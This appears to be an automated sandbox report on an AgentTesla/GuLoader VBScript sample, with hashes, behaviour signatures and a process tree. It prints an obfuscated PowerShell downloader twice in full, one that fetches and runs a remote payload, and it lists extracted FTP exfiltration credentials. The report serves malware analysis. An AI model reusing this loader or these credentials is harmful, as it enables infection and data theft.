agenttesla | 34f4d416f700e77ef730f4ee4207218e7a3f978fc40efd8b7a399d58113d26b5

Resubmissions

11-12-2023 17:03

231211-vk7zhsecb2 10

11-12-2023 09:42

231211-lpcvhacef5 10

Analysis

max time kernel
149s
max time network
121s
platform
windows7_x64
resource
win7-20231025-en
resource tags

arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
submitted
11-12-2023 09:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DH-087481 IMG.vbe
Size

81KB
MD5

b0e1835d06d4ae28eb1e1cee627360ea
SHA1

31c82a2038f281fcc43377706d00c79c1d07bcee
SHA256

34f4d416f700e77ef730f4ee4207218e7a3f978fc40efd8b7a399d58113d26b5
SHA512

506479a1dd46f52000a175b779c1882610e432bfa4341ce0e4eaca975b9cc7f1ae45618bd68cfe934484e2347c2f9cb070c6e8b0c01938134a7fa7047a1c23df
SSDEEP

1536:vZL/8DxkbzqcfC+bxucaTm1oF65imB6WgF8/SEcLuwI4u7293H:Br8DxMzpf5xuha1oFuiG6hyKJpI4uy93

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.cefin.bg
Port:
21
Username:
[email protected]
Password:
#UuXy?6cIbL+

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 api.ipify.org
12 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msbuild.exe

pid process

2948 msbuild.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsbuild.exe

pid process

2880 powershell.exe
2948 msbuild.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2880 set thread context of 2948 2880 powershell.exe msbuild.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exemsbuild.exe

pid process

2804 powershell.exe
2880 powershell.exe
2948 msbuild.exe
2948 msbuild.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2880 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exemsbuild.exe

description pid process

Token: SeDebugPrivilege 2804 powershell.exe
Token: SeDebugPrivilege 2880 powershell.exe
Token: SeDebugPrivilege 2948 msbuild.exe

flow	ioc
11	api.ipify.org
12	api.ipify.org

pid	process
2948	msbuild.exe

pid	process
2880	powershell.exe
2948	msbuild.exe

description	pid	process	target process
PID 2880 set thread context of 2948	2880	powershell.exe	msbuild.exe

pid	process
2804	powershell.exe
2880	powershell.exe
2948	msbuild.exe
2948	msbuild.exe

pid	process
2880	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2948	msbuild.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3048 wrote to memory of 2804	3048	WScript.exe	powershell.exe
PID 3048 wrote to memory of 2804	3048	WScript.exe	powershell.exe
PID 3048 wrote to memory of 2804	3048	WScript.exe	powershell.exe
PID 2804 wrote to memory of 2880	2804	powershell.exe	powershell.exe
PID 2804 wrote to memory of 2880	2804	powershell.exe	powershell.exe
PID 2804 wrote to memory of 2880	2804	powershell.exe	powershell.exe
PID 2804 wrote to memory of 2880	2804	powershell.exe	powershell.exe
PID 2880 wrote to memory of 2948	2880	powershell.exe	msbuild.exe
PID 2880 wrote to memory of 2948	2880	powershell.exe	msbuild.exe
PID 2880 wrote to memory of 2948	2880	powershell.exe	msbuild.exe
PID 2880 wrote to memory of 2948	2880	powershell.exe	msbuild.exe
PID 2880 wrote to memory of 2948	2880	powershell.exe	msbuild.exe
PID 2880 wrote to memory of 2948	2880	powershell.exe	msbuild.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DH-087481 IMG.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function scrophularia9 ($pollyannish){$Exallotriotebenholtsfljten = $pollyannish.Length-1; For ($Exallotriote=6; $Exallotriote -lt $Exallotriotebenholtsfljten){$Svmmeblre=$Svmmeblre+$pollyannish.Substring( $Exallotriote, 1);$Exallotriote+=7;}$Svmmeblre;}$Oinologies=scrophularia9 'Fluoroh KindetFestlit PunktpGrnsef:perenn/Benytt/EngluerPindsva Ligkac Letmak UnroboDowereoSeriernKabelt.SharpsnPotoroeNonenetDitchb/InternwBlaaalpCister-SickweiHuldsaninfantcElektrlBrombeuBrilladMetameeBehandsEksami/PreconfLukkeloTightfnEconomt Fredss Rewea/explosMMedalli ChantlGlendajcardiom DreadiAnkerpnUnanimiTillitsSabotetPensive Nakitr hayrai RakinuCpddkemBluenesscliff.NonrevmBrandssroperio Kiefo ';$Svmmeblre01=scrophularia9 'VoldsfiSkammeeHukommxPolyto ';$Uncontemporaneously = scrophularia9 'Brudne\meetabs DepriyVajinhs AssocwPrdispoBeridewTracer6 Payni4Hoseur\IngensWSemiauidaintinTinajadhunknsoRowellwMilionsBesiddPforbasosukkerwHabdalemechanranklagS fulfihTidsaleSporoslBirdsol Psych\BrolggvTranvi1Raagum.Chamoi0Hondur\UdmntepagtersoMikroswLaridseKonomirUnenras HumanhIldeseeBrystpl BjerglWordis.MoniedeSymaskxAdgangeFinoch ';. ($Svmmeblre01) (scrophularia9 ' Phyll$ NoncaMHemocyoGomutitBroadaotonguerwhencebGlatbaaBackcaaStatssdJuleka2Skatte=Isoque$AntiopeCirrocnEmphatvLimone:DefuzewdiagoniMattedntidiesdSwashei HoffmrHjemvi ') ;. ($Svmmeblre01) (scrophularia9 'Indkom$CranehUAvocadnAutonocCircumoFjortenTungmetKolonie RessamArchonpBagstroMedbrirUtaalmarecitenBuggyaeBevaeboNukleauByguersPolygolUnprivy Indpr=Gyrati$DjalmaMFurtheoDiscustAutodioOxidisrSkrmdibUgelnna Helika UnpoedKonsul2noncur+Dogmat$lydlseUIntrafnRosenscchromooRvetornTurriftDurabieVrgedem EmprepKlkkero PreclrCibolzaAchroinIdeoloeTingfaoArbejdustraalsMenololLinettyPropar ') ;& ($Svmmeblre01) (scrophularia9 'Opgave$OverciOCalyxedLysteleInvasisOstiae Gangl=Tapper Faunol(Maatte(XylofogFagklawBlokkam AbsceiLokali KapselwTilspiiRikardnReenco3Talles2netvin_Obsessp extrar TordeoFetialcCleavee BurglsBrattesIndust Cityf-PletteFStratu UnshakPOptatirPartioo Fodtuc MlkeheStormasRuslansStemmeISassagdAbranc= Misvi$Preppi{CarlylPDetermI DrapeD Ortho}Unbust)Tunghr.KidnapC Wieldo IkrafmSmagsamFngsela GtemanLegerid AandsLBrumbaiKilobinGarnise Levne)Demetr Intral-HeraclsTransppStatselPrioriiInconst Anstt Ideol[AlderscResonehTopforafstemnrPropod]rrende3Gttevr4Sclero ');& ($Svmmeblre01) (scrophularia9 ' kbsla$KoncerVeternai GladynPremodtSrgesae Vaughr brach Cathea=Sprogb Brndeo$TautolOTimetadStrelieBegoalsForeth[Myoper$TumoroOForhaldBerrineFrowsmsPoliti.excentcNonrecoPholiduFlervenOffenttSteved- Inter2Coturn]Eiasor ');& ($Svmmeblre01) (scrophularia9 'Oxychl$VertebNAllocha JudictjacamauPrposirGruesoe StraflBerigns StatskCardioeInfurirDegenenStenogeRepert=Optima(QuantaTNaelkaeCountes CounttSmeeky-KnsdelPMorinaahumourtRatstrhDiverg cellu$ApotekUCinnalnParadoc ArbejoTyndtan MarketAppoineRhesusmCovetaphusmodoJudsonrStedfdaMerribn HvnineEmissio BevisuAggressPoultslHeiintyKitsch) Hensl Under-FlapdrA smigenNonherd Mutil Copybo(Shpteo[ChristI GuttunBetragt ClarePIndustt uncrirSnuppe]outhea:Skttea: SkppesExopteiTrosbezPolemieFransk Folke- NonapeInvertqupheal Drosch8Klitpl)Underk ') ;if ($Naturelskerne) {& $Uncontemporaneously $Vinter;} else {;$Svmmeblre00=scrophularia9 'HypidiSEncamptSmidigaAvengerextemptAccele-CodlinB PachyiVkkeretSpectrsFjteraT Mejetr Jobbea EkshinTurgois WyoutfDyrplaeEksekurQueeni Vasil- TeatrSInsertoYohimbu SprngrAgterucUbeboeelukker Fuske$ AcharOJordoniferritnConcepogoatmal Somnio Uvejrg Stenfitilsige vildtsRekind Readie-TordenDEfterle motorsStrafpt MiddeirumpernNonconaAfgangtEtaersiDissekoFaktornLaanef Ebcasc$ForkorM SelvfoOvergatHyndesoPhilomrGuestib PerniabemandaInvulndFrimur2Misact ';& ($Svmmeblre01) (scrophularia9 ' Editr$ HavfrMinsignoMusikttSuleimomadamdrMistrabFibrouaAdenovaSystemdRetrot2Infice=Pseudo$ Forbie TrawanHypogyvRegnes:Choltra Bodemp GratipBladnidtournaaSteddatUnoffea Dekin ') ;& ($Svmmeblre01) (scrophularia9 'GstgivI Gabbim autaxp AmortoriantsrKulturtNagelf-FlorerMBiconcoNonpardBlotteuBundsklGaestfeNonocc UncrowBSelektiBjernetFinanssMonarcT PrivarUnconcaSubumbnAfrusts validfUdsugeeChalinrOmsorg ') ;$Motorbaad2=$Motorbaad2+'\Burnsian.Ena';while (-not $Luxemburgsk) {. ($Svmmeblre01) (scrophularia9 'Chymou$JajmanLunavnguUnvextxHertugeValfarmFennerb SaprouUtilstr Odgergmartins Leverkskyldn=simult(ModellTCoddinetvrstrs CrambtNezita-ReginaPCompena LepidtUnservhfilari Asylby$ UphasM Evindo RomantTidsruoBombesrInherebTvangsaSufficaBallondMultic2Rosett)Antior ') ;.($Svmmeblre01) $Svmmeblre00;.($Svmmeblre01) (scrophularia9 'PyretoSWithert tillbaTebirkr Syvaat anega-NedskrSHypophltredjeePrepsleLavpripChawks Meowed5 Flisk ');}& ($Svmmeblre01) (scrophularia9 'plutok$NedskasgeneracAnstaarBramraoOutroappockethSemicouFritzelEnnoblaUnglidrUnborridiluteaDestin iscrem= terep DennovGDesecre FjendtBudbri- galteCGldspooBurresnklemhatMeldereParallnChuzwitTilsyn Tingen$BallgoMMiroscoOutseat LinjeoWoodnyrTermitbBortkoaKotelea TestudGreenh2imprgn ');&($Svmmeblre01) (scrophularia9 'Betwat$PlacemGgavstruPistoliIldtorlUnderkl DockieTonguemAflbsr Womani= thurs Cancer[CnicusSHvsedeyKalveksNisrestEmbarqeTillavm Petit.DuetteCTerninoOsteotnHelgemv Diskfe SadomrTotalbtEnribo]infame:Stopve:WanganFgarryarImmindoProtodmFldeosBForsvaa GrundsLedsageFiduse6 Schiz4amplifS TestitVenstrrForporiEliminnDapichgStreng(Starva$HexatesAvisovcSdekorr SkjoroSwallopsceuophRatifiu GentilRespekaReskndr Obambi TobauaProxim) Proce ');. ($Svmmeblre01) (scrophularia9 'Widesg$OveratSGalionvRusinemKatalymHissedeKvartsbArtilllValgtyrBttefuePlemoc2Prevos Isoval=Denise Rumfan[ CrystSUtryggyLightesSlbernt MarineSaprogmUlvefo.RecensTKoncene Ggepuxaustrit endev.KsnehaERegistnregistcGobiifo BrydndLilleti Opregneffundg Sport]Vildtr: Naboi:FactorABlodigSBirgitCKrigsuIPitikiI Ufork.MaxilnG Glucoe PainttBrugerS Intert ReorgrFarvepi KnortnunprefgKirkeg(fluvic$EgentlGPrunesuKnebleiJudgmelPensiolOverfaeAnraabmDiurnu)Termog ');. ($Svmmeblre01) (scrophularia9 ' Indek$ VansiP DevilhVeddanl Betroo BuddhrForfalhFormyliUnsaliz PateniBehandnRdmebu=Fakute$ AmoriSMesocavHousehmVirtuomKorsfseForledbVandrelRedbairDelelie Oblig2Sonder.Knugeds PaadruGarageb NydelsSignalt Waterr Ishtai FecunnTotallgBrides(Billyg2Scudde9Candmu9Fintma6Ocypet7Interl1 Unmag,Cipher2Forblf6nonpen0 Hjemm0Beerma5Trisul)Fierce ');. ($Svmmeblre01) $Phlorhizin;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function scrophularia9 ($pollyannish){$Exallotriotebenholtsfljten = $pollyannish.Length-1; For ($Exallotriote=6; $Exallotriote -lt $Exallotriotebenholtsfljten){$Svmmeblre=$Svmmeblre+$pollyannish.Substring( $Exallotriote, 1);$Exallotriote+=7;}$Svmmeblre;}$Oinologies=scrophularia9 'Fluoroh KindetFestlit PunktpGrnsef:perenn/Benytt/EngluerPindsva Ligkac Letmak UnroboDowereoSeriernKabelt.SharpsnPotoroeNonenetDitchb/InternwBlaaalpCister-SickweiHuldsaninfantcElektrlBrombeuBrilladMetameeBehandsEksami/PreconfLukkeloTightfnEconomt Fredss Rewea/explosMMedalli ChantlGlendajcardiom DreadiAnkerpnUnanimiTillitsSabotetPensive Nakitr hayrai RakinuCpddkemBluenesscliff.NonrevmBrandssroperio Kiefo ';$Svmmeblre01=scrophularia9 'VoldsfiSkammeeHukommxPolyto ';$Uncontemporaneously = scrophularia9 'Brudne\meetabs DepriyVajinhs AssocwPrdispoBeridewTracer6 Payni4Hoseur\IngensWSemiauidaintinTinajadhunknsoRowellwMilionsBesiddPforbasosukkerwHabdalemechanranklagS fulfihTidsaleSporoslBirdsol Psych\BrolggvTranvi1Raagum.Chamoi0Hondur\UdmntepagtersoMikroswLaridseKonomirUnenras HumanhIldeseeBrystpl BjerglWordis.MoniedeSymaskxAdgangeFinoch ';. ($Svmmeblre01) (scrophularia9 ' Phyll$ NoncaMHemocyoGomutitBroadaotonguerwhencebGlatbaaBackcaaStatssdJuleka2Skatte=Isoque$AntiopeCirrocnEmphatvLimone:DefuzewdiagoniMattedntidiesdSwashei HoffmrHjemvi ') ;. ($Svmmeblre01) (scrophularia9 'Indkom$CranehUAvocadnAutonocCircumoFjortenTungmetKolonie RessamArchonpBagstroMedbrirUtaalmarecitenBuggyaeBevaeboNukleauByguersPolygolUnprivy Indpr=Gyrati$DjalmaMFurtheoDiscustAutodioOxidisrSkrmdibUgelnna Helika UnpoedKonsul2noncur+Dogmat$lydlseUIntrafnRosenscchromooRvetornTurriftDurabieVrgedem EmprepKlkkero PreclrCibolzaAchroinIdeoloeTingfaoArbejdustraalsMenololLinettyPropar ') ;& ($Svmmeblre01) (scrophularia9 'Opgave$OverciOCalyxedLysteleInvasisOstiae Gangl=Tapper Faunol(Maatte(XylofogFagklawBlokkam AbsceiLokali KapselwTilspiiRikardnReenco3Talles2netvin_Obsessp extrar TordeoFetialcCleavee BurglsBrattesIndust Cityf-PletteFStratu UnshakPOptatirPartioo Fodtuc MlkeheStormasRuslansStemmeISassagdAbranc= Misvi$Preppi{CarlylPDetermI DrapeD Ortho}Unbust)Tunghr.KidnapC Wieldo IkrafmSmagsamFngsela GtemanLegerid AandsLBrumbaiKilobinGarnise Levne)Demetr Intral-HeraclsTransppStatselPrioriiInconst Anstt Ideol[AlderscResonehTopforafstemnrPropod]rrende3Gttevr4Sclero ');& ($Svmmeblre01) (scrophularia9 ' kbsla$KoncerVeternai GladynPremodtSrgesae Vaughr brach Cathea=Sprogb Brndeo$TautolOTimetadStrelieBegoalsForeth[Myoper$TumoroOForhaldBerrineFrowsmsPoliti.excentcNonrecoPholiduFlervenOffenttSteved- Inter2Coturn]Eiasor ');& ($Svmmeblre01) (scrophularia9 'Oxychl$VertebNAllocha JudictjacamauPrposirGruesoe StraflBerigns StatskCardioeInfurirDegenenStenogeRepert=Optima(QuantaTNaelkaeCountes CounttSmeeky-KnsdelPMorinaahumourtRatstrhDiverg cellu$ApotekUCinnalnParadoc ArbejoTyndtan MarketAppoineRhesusmCovetaphusmodoJudsonrStedfdaMerribn HvnineEmissio BevisuAggressPoultslHeiintyKitsch) Hensl Under-FlapdrA smigenNonherd Mutil Copybo(Shpteo[ChristI GuttunBetragt ClarePIndustt uncrirSnuppe]outhea:Skttea: SkppesExopteiTrosbezPolemieFransk Folke- NonapeInvertqupheal Drosch8Klitpl)Underk ') ;if ($Naturelskerne) {& $Uncontemporaneously $Vinter;} else {;$Svmmeblre00=scrophularia9 'HypidiSEncamptSmidigaAvengerextemptAccele-CodlinB PachyiVkkeretSpectrsFjteraT Mejetr Jobbea EkshinTurgois WyoutfDyrplaeEksekurQueeni Vasil- TeatrSInsertoYohimbu SprngrAgterucUbeboeelukker Fuske$ AcharOJordoniferritnConcepogoatmal Somnio Uvejrg Stenfitilsige vildtsRekind Readie-TordenDEfterle motorsStrafpt MiddeirumpernNonconaAfgangtEtaersiDissekoFaktornLaanef Ebcasc$ForkorM SelvfoOvergatHyndesoPhilomrGuestib PerniabemandaInvulndFrimur2Misact ';& ($Svmmeblre01) (scrophularia9 ' Editr$ HavfrMinsignoMusikttSuleimomadamdrMistrabFibrouaAdenovaSystemdRetrot2Infice=Pseudo$ Forbie TrawanHypogyvRegnes:Choltra Bodemp GratipBladnidtournaaSteddatUnoffea Dekin ') ;& ($Svmmeblre01) (scrophularia9 'GstgivI Gabbim autaxp AmortoriantsrKulturtNagelf-FlorerMBiconcoNonpardBlotteuBundsklGaestfeNonocc UncrowBSelektiBjernetFinanssMonarcT PrivarUnconcaSubumbnAfrusts validfUdsugeeChalinrOmsorg ') ;$Motorbaad2=$Motorbaad2+'\Burnsian.Ena';while (-not $Luxemburgsk) {. ($Svmmeblre01) (scrophularia9 'Chymou$JajmanLunavnguUnvextxHertugeValfarmFennerb SaprouUtilstr Odgergmartins Leverkskyldn=simult(ModellTCoddinetvrstrs CrambtNezita-ReginaPCompena LepidtUnservhfilari Asylby$ UphasM Evindo RomantTidsruoBombesrInherebTvangsaSufficaBallondMultic2Rosett)Antior ') ;.($Svmmeblre01) $Svmmeblre00;.($Svmmeblre01) (scrophularia9 'PyretoSWithert tillbaTebirkr Syvaat anega-NedskrSHypophltredjeePrepsleLavpripChawks Meowed5 Flisk ');}& ($Svmmeblre01) (scrophularia9 'plutok$NedskasgeneracAnstaarBramraoOutroappockethSemicouFritzelEnnoblaUnglidrUnborridiluteaDestin iscrem= terep DennovGDesecre FjendtBudbri- galteCGldspooBurresnklemhatMeldereParallnChuzwitTilsyn Tingen$BallgoMMiroscoOutseat LinjeoWoodnyrTermitbBortkoaKotelea TestudGreenh2imprgn ');&($Svmmeblre01) (scrophularia9 'Betwat$PlacemGgavstruPistoliIldtorlUnderkl DockieTonguemAflbsr Womani= thurs Cancer[CnicusSHvsedeyKalveksNisrestEmbarqeTillavm Petit.DuetteCTerninoOsteotnHelgemv Diskfe SadomrTotalbtEnribo]infame:Stopve:WanganFgarryarImmindoProtodmFldeosBForsvaa GrundsLedsageFiduse6 Schiz4amplifS TestitVenstrrForporiEliminnDapichgStreng(Starva$HexatesAvisovcSdekorr SkjoroSwallopsceuophRatifiu GentilRespekaReskndr Obambi TobauaProxim) Proce ');. ($Svmmeblre01) (scrophularia9 'Widesg$OveratSGalionvRusinemKatalymHissedeKvartsbArtilllValgtyrBttefuePlemoc2Prevos Isoval=Denise Rumfan[ CrystSUtryggyLightesSlbernt MarineSaprogmUlvefo.RecensTKoncene Ggepuxaustrit endev.KsnehaERegistnregistcGobiifo BrydndLilleti Opregneffundg Sport]Vildtr: Naboi:FactorABlodigSBirgitCKrigsuIPitikiI Ufork.MaxilnG Glucoe PainttBrugerS Intert ReorgrFarvepi KnortnunprefgKirkeg(fluvic$EgentlGPrunesuKnebleiJudgmelPensiolOverfaeAnraabmDiurnu)Termog ');. ($Svmmeblre01) (scrophularia9 ' Indek$ VansiP DevilhVeddanl Betroo BuddhrForfalhFormyliUnsaliz PateniBehandnRdmebu=Fakute$ AmoriSMesocavHousehmVirtuomKorsfseForledbVandrelRedbairDelelie Oblig2Sonder.Knugeds PaadruGarageb NydelsSignalt Waterr Ishtai FecunnTotallgBrides(Billyg2Scudde9Candmu9Fintma6Ocypet7Interl1 Unmag,Cipher2Forblf6nonpen0 Hjemm0Beerma5Trisul)Fierce ');. ($Svmmeblre01) $Phlorhizin;}"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F54FIQ4K2OUQLL2ND5FW.temp

Filesize
7KB

MD5
69e49c39a3f1dd8879f24f83c85281e0

SHA1
b4b974fab0248132b02d1e7c69f163fd7d45977a

SHA256
490e1b7a8c47c8824126670a449cafe8936f0938b215a47a12ae635a84143a8a

SHA512
5a8212221948d15b78f0d5ce6d4ff410bc26b9b2d870cecb9cb615d5d26afddb8f917eec2c21631ed86c9302a195a44c0d6de78486b1cdccbaa3974479549dfa

Download Submit
memory/2804-10-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download
memory/2804-5-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/2804-7-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-8-0x000000001B300000-0x000000001B5E2000-memory.dmp

Filesize
2.9MB

Download
memory/2804-9-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/2804-29-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/2804-11-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/2804-6-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/2804-51-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-4-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-31-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/2804-30-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/2804-27-0x000007FEF5700000-0x000007FEF609D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-28-0x00000000026C0000-0x0000000002740000-memory.dmp

Filesize
512KB

Download
memory/2880-35-0x0000000005BD0000-0x0000000005BD1000-memory.dmp

Filesize
4KB

Download
memory/2880-36-0x0000000000780000-0x00000000007C0000-memory.dmp

Filesize
256KB

Download
memory/2880-16-0x0000000000780000-0x00000000007C0000-memory.dmp

Filesize
256KB

Download
memory/2880-32-0x0000000073530000-0x0000000073ADB000-memory.dmp

Filesize
5.7MB

Download
memory/2880-33-0x0000000000780000-0x00000000007C0000-memory.dmp

Filesize
256KB

Download
memory/2880-15-0x0000000073530000-0x0000000073ADB000-memory.dmp

Filesize
5.7MB

Download
memory/2880-34-0x00000000062A0000-0x0000000007A76000-memory.dmp

Filesize
23.8MB

Download
memory/2880-47-0x0000000073530000-0x0000000073ADB000-memory.dmp

Filesize
5.7MB

Download
memory/2880-37-0x00000000062A0000-0x0000000007A76000-memory.dmp

Filesize
23.8MB

Download
memory/2880-40-0x00000000774F0000-0x0000000077699000-memory.dmp

Filesize
1.7MB

Download
memory/2880-41-0x00000000776E0000-0x00000000777B6000-memory.dmp

Filesize
856KB

Download
memory/2880-14-0x0000000073530000-0x0000000073ADB000-memory.dmp

Filesize
5.7MB

Download
memory/2880-43-0x00000000062A0000-0x0000000007A76000-memory.dmp

Filesize
23.8MB

Download
memory/2880-17-0x0000000000780000-0x00000000007C0000-memory.dmp

Filesize
256KB

Download
memory/2880-49-0x00000000062A0000-0x0000000007A76000-memory.dmp

Filesize
23.8MB

Download
memory/2948-44-0x00000000774F0000-0x0000000077699000-memory.dmp

Filesize
1.7MB

Download
memory/2948-46-0x0000000000440000-0x0000000001C16000-memory.dmp

Filesize
23.8MB

Download
memory/2948-45-0x000000006F800000-0x0000000070862000-memory.dmp

Filesize
16.4MB

Download
memory/2948-50-0x000000006F800000-0x000000006F840000-memory.dmp

Filesize
256KB

Download
memory/2948-52-0x000000006F070000-0x000000006F75E000-memory.dmp

Filesize
6.9MB

Download
memory/2948-42-0x0000000000440000-0x0000000001C16000-memory.dmp

Filesize
23.8MB

Download
memory/2948-53-0x000000001D470000-0x000000001D4B0000-memory.dmp

Filesize
256KB

Download
memory/2948-54-0x0000000000440000-0x0000000001C16000-memory.dmp

Filesize
23.8MB

Download
memory/2948-57-0x000000006F070000-0x000000006F75E000-memory.dmp

Filesize
6.9MB

Download
memory/2948-58-0x000000001D470000-0x000000001D4B0000-memory.dmp

Filesize
256KB

Download